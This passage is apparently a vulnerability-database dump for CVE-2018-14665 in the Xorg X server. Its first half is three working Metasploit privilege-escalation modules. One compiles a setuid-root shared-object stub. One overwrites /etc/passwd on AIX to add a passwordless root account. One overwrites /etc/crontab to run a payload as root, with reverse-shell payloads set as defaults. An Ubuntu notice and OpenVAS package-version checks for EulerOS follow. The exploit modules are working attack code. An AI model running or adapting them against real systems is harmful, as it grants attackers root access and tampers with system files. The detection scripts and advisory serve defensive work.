-un\"\n unless exist? 
\"/var/run/console/#{user}\"\n vprint_error \"No console lock for #{user}\"\n return CheckCode::Safe\n end\n vprint_good \"Console lock for #{user}\"\n end\n end\n\n # suid program check\n xorg_path = cmd_exec \"command -v Xorg\"\n unless xorg_path.include?(\"Xorg\")\n vprint_error \"Could not find Xorg executable\"\n return CheckCode::Safe\n end\n vprint_good \"Xorg path found at #{xorg_path}\"\n unless setuid? xorg_path\n vprint_error \"Xorg binary #{xorg_path} is not SUID\"\n return CheckCode::Safe\n end\n vprint_good \"Xorg binary #{xorg_path} is SUID\"\n\n x_version = cmd_exec \"Xorg -version\"\n if x_version.include?(\"Release Date\")\n v = Gem::Version.new(x_version.scan(/\\d\\.\\d+\\.\\d+/).first)\n unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2'))\n vprint_error \"Xorg version #{v} not supported\"\n return CheckCode::Safe\n end\n elsif x_version.include?(\"Fatal server error\")\n vprint_error \"User probably does not have console auth\"\n vprint_error \"Below is Xorg -version output\"\n vprint_error x_version\n return CheckCode::Safe\n else\n vprint_warning \"Could not parse Xorg -version output\"\n return CheckCode::Appears\n end\n vprint_good \"Xorg version #{v} is vulnerable\"\n\n # process check for /X\n proc_list = cmd_exec \"ps ax\"\n if proc_list.include?('/X ')\n vprint_warning('Xorg in process list')\n return CheckCode::Appears\n end\n vprint_good('Xorg does not appear to be running')\n return CheckCode::Vulnerable\n end\n\n def check_arch_and_compile(path, data)\n cpu = ''\n if target['Arch'] == ARCH_X86\n cpu = Metasm::Ia32.new\n compile_with_metasm(cpu, path, data)\n elsif target['Arch'] == ARCH_SPARC\n compile_with_gcc(path, data)\n else\n cpu = Metasm::X86_64.new\n compile_with_metasm(cpu, path, data)\n end\n end\n\n def compile_with_metasm(cpu, path, data)\n shared_obj = Metasm::ELF.compile_c(cpu, data).encode_string(:lib)\n write_file(path, shared_obj)\n register_file_for_cleanup path\n\n chmod path\n rescue\n 
print_status('Failed to compile with Metasm. Falling back to compiling with GCC.')\n compile_with_gcc(path, data)\n end\n\n def compile_with_gcc(path, data)\n unless has_gcc?\n fail_with Failure::BadConfig, 'gcc is not installed'\n end\n vprint_good 'gcc is installed'\n\n src_path = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(6..10)}.c\"\n write_file(src_path, data)\n\n gcc_cmd = \"gcc -fPIC -shared -o #{path} #{src_path} -nostartfiles\"\n if session.type.eql? 'shell'\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\n end\n output = cmd_exec gcc_cmd\n register_file_for_cleanup src_path\n register_file_for_cleanup path\n\n unless output.blank?\n print_error output\n fail_with Failure::Unknown, \"#{src_path} failed to compile\"\n end\n\n chmod path\n end\n\n def exploit\n check_status = check\n if check_status == CheckCode::Appears\n print_warning 'Could not get version or Xorg process possibly running, may fail'\n elsif check_status == CheckCode::Safe\n fail_with Failure::NotVulnerable, 'Target not vulnerable'\n end\n\n if is_root?\n fail_with Failure::BadConfig, 'This session already has root privileges'\n end\n\n unless writable? 
datastore['WritableDir']\n fail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\"\n end\n\n print_good 'Passed all initial checks for exploit'\n\n modulepath = datastore['WritableDir']\n sofile = \"#{modulepath}/#{datastore['sofile']}\"\n pscript = \"#{modulepath}/.session-#{rand_text_alphanumeric 5..10}\"\n xdisplay = datastore['Xdisplay']\n\n stub = %Q^\nextern int setuid(int);\nextern int setgid(int);\nextern int system(const char *__s);\n\nvoid _init(void) __attribute__((constructor));\n\nvoid __attribute__((constructor)) _init() {\nsetgid(0);\nsetuid(0);\nsystem(\"#{pscript} &\");\n }\n ^\n print_status 'Writing launcher and compiling'\n check_arch_and_compile(sofile, stub)\n\n # Uploading\n print_status 'Uploading your payload, this could take a while'\n if payload.arch.first == 'cmd'\n write_file(pscript, payload.encoded)\n else\n write_file(pscript, generate_payload_exe)\n end\n chmod pscript\n register_file_for_cleanup pscript\n\n\n # Actual exploit with cron overwrite\n print_status 'Exploiting'\n #Xorg -logfile derp -modulepath ',/tmp' :1\n xorg_cmd = \"Xorg -modulepath ',#{modulepath}' #{xdisplay} & >/dev/null\"\n cmd_exec xorg_cmd\n Rex.sleep 7\n cmd_exec \"pkill Xorg\"\n Rex.sleep 1\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/local/xorg_x11_suid_server_modulepath.rb"}, {"lastseen": "2020-10-12T04:22:08", "description": "WARNING: Successful execution of this module results in /etc/passwd being overwritten. This module is a port of the OpenBSD X11 Xorg exploit to run on AIX. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1. 
Due to permission restrictions of the crontab in AIX, this module does not use cron, and instead overwrites /etc/passwd in order to create a new user with root privileges. All currently logged in users need to be included when /etc/passwd is overwritten, else AIX will throw 'Cannot get \"LOGNAME\" variable' when attempting to change user. The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX, and is replaced by '-config', in conjunction with ANSI-C quotes to inject newlines when overwriting /etc/passwd.\n", "published": "2019-02-06T11:42:40", "type": "metasploit", "title": "Xorg X11 Server Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/AIX/LOCAL/XORG_X11_SERVER", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GreatRanking\n\n include Msf::Post::File\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Xorg X11 Server Local Privilege Escalation',\n 'Description' => %q(\n WARNING: Successful execution of this module results in /etc/passwd being overwritten.\n\n This module is a port of the OpenBSD X11 Xorg exploit to run on AIX.\n\n A permission check flaw exists for -modulepath and -logfile options when\n starting Xorg. 
This allows unprivileged users that can start the server\n the ability to elevate privileges and run arbitrary code under root\n privileges.\n\n This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1.\n Due to permission restrictions of the crontab in AIX, this module does not use cron,\n and instead overwrites /etc/passwd in order to create a new user with root privileges.\n All currently logged in users need to be included when /etc/passwd is overwritten,\n else AIX will throw 'Cannot get \"LOGNAME\" variable' when attempting to change user.\n The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,\n and is replaced by '-config', in conjunction with ANSI-C quotes to inject newlines when\n overwriting /etc/passwd.\n ),\n 'Author' =>\n [\n 'Narendra Shinde', # Discovery and original FreeBSD exploit\n 'Zack Flack <dzflack[at]gmail.com>' # Metasploit module and original AIX exploit\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2018-10-25',\n 'Notes' =>\n {\n 'SideEffects' => [ CONFIG_CHANGES ]\n },\n 'References' =>\n [\n ['CVE', '2018-14665'],\n ['URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html'],\n ['URL', 'https://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc'],\n ['URL', 'https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl'],\n ['EDB', '45938']\n ],\n 'Platform' => ['unix'],\n 'Arch' => [ARCH_CMD],\n 'SessionTypes' => ['shell'],\n 'Payload' => {\n 'Compat' => {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl'\n }\n },\n 'DefaultOptions' => {\n 'Payload' => 'cmd/unix/reverse_perl'\n },\n 'Targets' =>\n [\n ['IBM AIX Version 6.1', {}],\n ['IBM AIX Version 7.1', {}],\n ['IBM AIX Version 7.2', {}]\n ],\n 'DefaultTarget' => 1))\n\n register_options(\n [\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n )\n end\n\n def check\n xorg_path = cmd_exec('command -v Xorg')\n if !xorg_path.include?('Xorg')\n 
print_error('Could not find Xorg executable')\n return Exploit::CheckCode::Safe\n end\n\n ksh93_path = cmd_exec('command -v ksh93')\n if !ksh93_path.include?('ksh')\n print_error('Could not find Ksh93 executable')\n return Exploit::CheckCode::Safe\n end\n\n if !xorg_vulnerable?\n print_error('Xorg version is not vulnerable')\n return Exploit::CheckCode::Safe\n end\n\n return Exploit::CheckCode::Appears\n end\n\n def exploit\n status = check\n\n if status == Exploit::CheckCode::Safe\n fail_with(Failure::NotVulnerable, '')\n end\n\n if !writable?(datastore['WritableDir'])\n fail_with(Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\")\n end\n\n xorg_path = cmd_exec('command -v Xorg')\n ksh93_path = cmd_exec('command -v ksh93')\n\n xorg_payload = generate_xorg_payload(xorg_path, ksh93_path, datastore['WritableDir'])\n xorg_script_path = \"#{datastore['WritableDir']}/wow.ksh\"\n upload_and_chmodx(xorg_script_path, xorg_payload)\n\n passwd_backup = \"#{datastore['WritableDir']}/passwd.backup\"\n print_status(\"Backing up /etc/passwd to #{passwd_backup}\")\n cmd_exec(\"cp /etc/passwd #{passwd_backup}\")\n register_file_for_cleanup(passwd_backup)\n\n print_status(\"Executing #{xorg_script_path}\")\n cmd_exec(xorg_script_path)\n print_status('Checking if we are root')\n\n if root?\n shell_payload = %(#!#{ksh93_path}\n#{payload.encoded}\n)\n shell_script_path = \"#{datastore['WritableDir']}/wowee.ksh\"\n upload_and_chmodx(shell_script_path, shell_payload)\n\n print_status('Executing shell payload')\n cmd_exec(\"#{ksh93_path} -c \\\"echo #{shell_script_path} | su - wow &\\\"\")\n\n print_status('Restoring original /etc/passwd')\n cmd_exec(\"su - wow -c \\\"cp #{passwd_backup} /etc/passwd\\\"\")\n else\n fail_with(Failure::PayloadFailed, '')\n end\n end\n\n def generate_xorg_payload(xorg_path, ksh93_path, writabledir)\n passwd_file = read_file('/etc/passwd')\n passwd_array = passwd_file.split(\"\\n\")\n\n print_status('Retrieving currently logged in users')\n 
users = cmd_exec('who | cut -d\\' \\' -f1 | sort | uniq')\n users << \"\\n\"\n users_array = users.split(\"\\n\")\n\n logged_in_users = ''\n if !users_array.empty?\n users_array.each do |user|\n user << ':'\n passwd_array.each do |line|\n if line.index(user) == 0\n logged_in_users << '\\n'\n logged_in_users << line\n end\n end\n end\n end\n\n passwd_data = \"$'#{logged_in_users}\\\\nwow::0:0::/:/usr/bin/ksh\\\\n#'\"\n\n subdir_count = writabledir.count('/')\n relative_passwd = '../' * subdir_count + '../../etc/passwd'\n\n return %(#!#{ksh93_path}\n #{xorg_path} -config #{passwd_data} -logfile #{relative_passwd} :1 > /dev/null 2>&1\n)\n end\n\n def xorg_vulnerable?\n version = cmd_exec('lslpp -L | grep -i X11.base.rte | awk \\'{ print $2 }\\'')\n print_status(\"Xorg version is #{version}\")\n semantic_version = Gem::Version.new(version)\n\n vulnerable_versions = [\n ['6.1.9.0', '6.1.9.100'],\n ['7.1.4.0', '7.1.4.30'],\n ['7.1.5.0', '7.1.5.31'],\n ['7.2.0.0', '7.2.0.1'],\n ['7.2.1.0', '7.2.1.0'],\n ['7.2.2.0', '7.2.2.0'],\n ['7.2.3.0', '7.2.3.15']\n ]\n\n vulnerable_versions.each do |version_pair|\n if semantic_version >= Gem::Version.new(version_pair[0]) &&\n semantic_version <= Gem::Version.new(version_pair[1])\n return true\n end\n end\n\n return false\n end\n\n def root?\n id_output = cmd_exec('su - wow -c \"id\"')\n\n if id_output.include?('euid=0') || id_output.include?('uid=0')\n print_good('Got root!')\n return true\n end\n\n print_error('Not root')\n false\n end\n\n def upload_and_chmodx(path, data)\n print_status(\"Writing to #{path}\")\n rm_f(path)\n write_file(path, data)\n cmd_exec(\"chmod 0555 '#{path}'\")\n\n register_file_for_cleanup(path)\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/aix/local/xorg_x11_server.rb"}, {"lastseen": "2020-10-13T17:33:21", "description": "This module attempts to gain root privileges with SUID Xorg 
X11 server versions 1.19.0 < 1.20.3. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with OpenBSD 6.3, 6.4, CentOS 7.4.1708, and CentOS 7.5.1804, and RHEL 7.5. The default PAM configuration for CentOS and RHEL systems requires console auth for the user's session to start the Xorg server. Cron launches the payload, so if SELinux is enforcing, exploitation may still be possible, but the module will bail. Xorg must have SUID permissions and may not start if already running. On exploitation a crontab.old backup file will be created by Xorg. This module will remove the .old file and restore crontab after successful exploitation. Failed exploitation may result in a corrupted crontab. On successful exploitation artifacts will be created consistent with starting Xorg and running a cron.\n", "published": "2018-11-11T07:43:36", "type": "metasploit", "title": "Xorg X11 Server SUID logfile Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/LOCAL/XORG_X11_SUID_SERVER", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::Kernel\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Xorg X11 Server SUID logfile Privilege Escalation',\n 'Description' => %q{\n This module attempts to gain root privileges with SUID Xorg X11 server\n versions 1.19.0 < 1.20.3.\n\n A permission check flaw exists for -modulepath and -logfile options when\n starting 
Xorg. This allows unprivileged users that can start the server\n the ability to elevate privileges and run arbitrary code under root\n privileges.\n\n This module has been tested with OpenBSD 6.3, 6.4, CentOS 7.4.1708, and\n CentOS 7.5.1804, and RHEL 7.5. The default PAM configuration for CentOS\n and RHEL systems requires console auth for the user's session to start\n the Xorg server.\n\n Cron launches the payload, so if SELinux is enforcing, exploitation\n may still be possible, but the module will bail.\n\n Xorg must have SUID permissions and may not start if already running.\n\n On exploitation a crontab.old backup file will be created by Xorg.\n This module will remove the .old file and restore crontab after\n successful exploitation. Failed exploitation may result in a corrupted\n crontab. On successful exploitation artifacts will be created consistent\n with starting Xorg and running a cron.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Narendra Shinde', # Discovery and exploit\n 'Raptor - 0xdea', # Modified exploit for cron\n 'Aaron Ringo', # Metasploit module\n 'bcoles' # Metasploit module\n ],\n 'DisclosureDate' => '2018-10-25',\n 'References' =>\n [\n [ 'CVE', '2018-14665' ],\n [ 'BID', '105741' ],\n [ 'EDB', '45697' ],\n [ 'EDB', '45742' ],\n [ 'EDB', '45832' ],\n [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ],\n [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]\n ],\n 'Platform' => %w[openbsd linux],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'SessionTypes' => %w[shell meterpreter],\n 'Targets' =>\n [\n ['OpenBSD', {\n 'Platform' => 'unix',\n 'Arch' => [ ARCH_CMD ] } ],\n ['Linux x64', {\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X64 ] } ],\n ['Linux x86', {\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X86 ] } ]\n ],\n 'DefaultOptions' =>\n {\n 'PAYLOAD' => 'cmd/unix/reverse_openssl',\n 'WfsDelay' => 120\n },\n 'DefaultTarget' => 0))\n\n register_advanced_options(\n [\n 
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),\n OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),\n OptBool.new('ConsoleLock', [ true, 'Will check for console lock on linux systems', true ])\n ]\n )\n end\n\n\n def check\n\n # linux checks\n uname = cmd_exec \"uname\"\n if uname =~ /linux/i\n vprint_status \"Running additional check for Linux\"\n if datastore['ConsoleLock']\n user = cmd_exec \"id -un\"\n unless exist? \"/var/run/console/#{user}\"\n vprint_error \"No console lock for #{user}\"\n return CheckCode::Safe\n end\n vprint_good \"Console lock for #{user}\"\n end\n if selinux_installed?\n if selinux_enforcing?\n vprint_error 'Selinux is enforcing'\n return CheckCode::Safe\n end\n end\n vprint_good \"Selinux is not an issue\"\n end\n\n # suid program check\n xorg_path = cmd_exec \"command -v Xorg\"\n unless xorg_path.include?(\"Xorg\")\n vprint_error \"Could not find Xorg executable\"\n return CheckCode::Safe\n end\n vprint_good \"Xorg path found at #{xorg_path}\"\n unless setuid? 
xorg_path\n vprint_error \"Xorg binary #{xorg_path} is not SUID\"\n return CheckCode::Safe\n end\n vprint_good \"Xorg binary #{xorg_path} is SUID\"\n\n # version check\n x_version = cmd_exec \"Xorg -version\"\n if x_version.include?(\"Release Date\")\n v = Gem::Version.new(x_version.scan(/\\d\\.\\d+\\.\\d+/).first)\n unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2'))\n vprint_error \"Xorg version #{v} not supported\"\n return CheckCode::Safe\n end\n elsif x_version.include?(\"Fatal server error\")\n vprint_error \"User probably does not have console auth\"\n vprint_error \"Below is Xorg -version output\"\n vprint_error x_version\n return CheckCode::Safe\n else\n vprint_warning \"Could not parse Xorg -version output\"\n return CheckCode::Appears\n end\n vprint_good \"Xorg version #{v} is vulnerable\"\n\n # process check for /X\n proc_list = cmd_exec \"ps ax\"\n if proc_list.include?('/X ')\n vprint_warning('Xorg in process list')\n return CheckCode::Appears\n end\n vprint_good('Xorg does not appear running')\n return CheckCode::Vulnerable\n end\n\n def on_new_session(session)\n if session.type.to_s.eql? 'meterpreter'\n session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'\n session.sys.process.execute '/bin/sh', \"-c \\\"#{@clean_up}\\\"\"\n else\n session.shell_command(@clean_up)\n end\n print_good \"Returning session after cleaning\"\n ensure\n super\n end\n\n def exploit\n\n check_status = check\n if check_status == CheckCode::Appears\n print_warning 'Could not get version or Xorg process possibly running, may fail'\n elsif check_status == CheckCode::Safe\n fail_with Failure::NotVulnerable, 'Target not vulnerable'\n end\n\n if is_root?\n fail_with Failure::BadConfig, 'This session already has root privileges'\n end\n\n unless writable? 
datastore['WritableDir']\n fail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\"\n end\n\n print_good 'Passed all initial checks for exploit'\n\n pscript = \"#{datastore['WritableDir']}/.session-#{rand_text_alphanumeric 5..10}\"\n @clean_up = \"/bin/cat #{pscript}.b > /etc/crontab ; /bin/rm -f #{pscript}.b /etc/crontab.old\"\n xdisplay = datastore['Xdisplay']\n\n # Uploading file crontab will run\n print_status 'Uploading your payload, this could take a while'\n if payload.arch.first == 'cmd'\n write_file(pscript, payload.encoded)\n else\n write_file(pscript, generate_payload_exe)\n end\n register_file_for_cleanup pscript\n chmod pscript\n\n # Exploit steps on crontab so backing it up\n cmd_exec \"cat /etc/crontab > #{pscript}.b\"\n # Actual exploit with cron overwrite\n print_status 'Trying /etc/crontab overwrite'\n cmd_exec \"cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab #{xdisplay} & >/dev/null\"\n Rex.sleep 5\n cmd_exec \"pkill Xorg\"\n Rex.sleep 1\n cron_check = cmd_exec \"grep -F #{pscript} /etc/crontab\"\n unless cron_check.include? pscript\n rm_f \"#{pscript}.b\"\n print_error 'Deleting crontab backup'\n fail_with Failure::NotVulnerable, '/etc/crontab not modified'\n end\n print_good '/etc/crontab overwrite successful. Waiting for job to run (may take a minute)...'\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/local/xorg_x11_suid_server.rb"}], "ubuntu": [{"lastseen": "2020-07-02T11:38:04", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14665"], "description": "Narendra Shinde discovered that the X.Org X server incorrectly handled \ncertain command line parameters when running as root with the legacy \nwrapper. 
When certain graphics drivers are being used, a local attacker \ncould possibly use this issue to overwrite arbitrary files and escalate \nprivileges.", "edition": 4, "modified": "2018-10-26T00:00:00", "published": "2018-10-26T00:00:00", "id": "USN-3802-1", "href": "https://ubuntu.com/security/notices/USN-3802-1", "title": "X.Org X server vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-03-14T16:50:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-03-13T00:00:00", "published": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562311220201236", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201236", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for xorg-x11-server (EulerOS-SA-2020-1236)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1236\");\n script_version(\"2020-03-13T07:17:23+0000\");\n script_cve_id(\"CVE-2018-14665\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 07:17:23 +0000 (Fri, 13 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-03-13 07:17:23 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for xorg-x11-server (EulerOS-SA-2020-1236)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.2\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1236\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1236\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'xorg-x11-server' package(s) announced via the EulerOS-SA-2020-1236 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An incorrect permission check for -modulepath and -logfile options when starting Xorg X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root 
privileges.(CVE-2018-14665)\");\n\n script_tag(name:\"affected\", value:\"'xorg-x11-server' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.2.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.2.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-Xorg\", rpm:\"xorg-x11-server-Xorg~1.19.5~5.h7\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-common\", rpm:\"xorg-x11-server-common~1.19.5~5.h7\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:34:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192553", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192553", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for xorg-x11-server (EulerOS-SA-2019-2553)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 
2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2553\");\n script_version(\"2020-01-23T13:05:32+0000\");\n script_cve_id(\"CVE-2018-14665\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 13:05:32 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 13:05:32 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for xorg-x11-server (EulerOS-SA-2019-2553)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2553\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2553\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'xorg-x11-server' package(s) announced via the EulerOS-SA-2019-2553 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A flaw was found 
in xorg-x11-server before 1.20.3. An incorrect permission check for -modulepath and -logfile options when starting Xorg. X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges.(CVE-2018-14665)\");\n\n script_tag(name:\"affected\", value:\"'xorg-x11-server' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-Xephyr\", rpm:\"xorg-x11-server-Xephyr~1.19.5~5.h7.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-Xorg\", rpm:\"xorg-x11-server-Xorg~1.19.5~5.h7.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-Xvfb\", rpm:\"xorg-x11-server-Xvfb~1.19.5~5.h7.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-common\", rpm:\"xorg-x11-server-common~1.19.5~5.h7.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T17:34:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2018-11-17T00:00:00", "id": "OPENVAS:1361412562310852126", "href": 
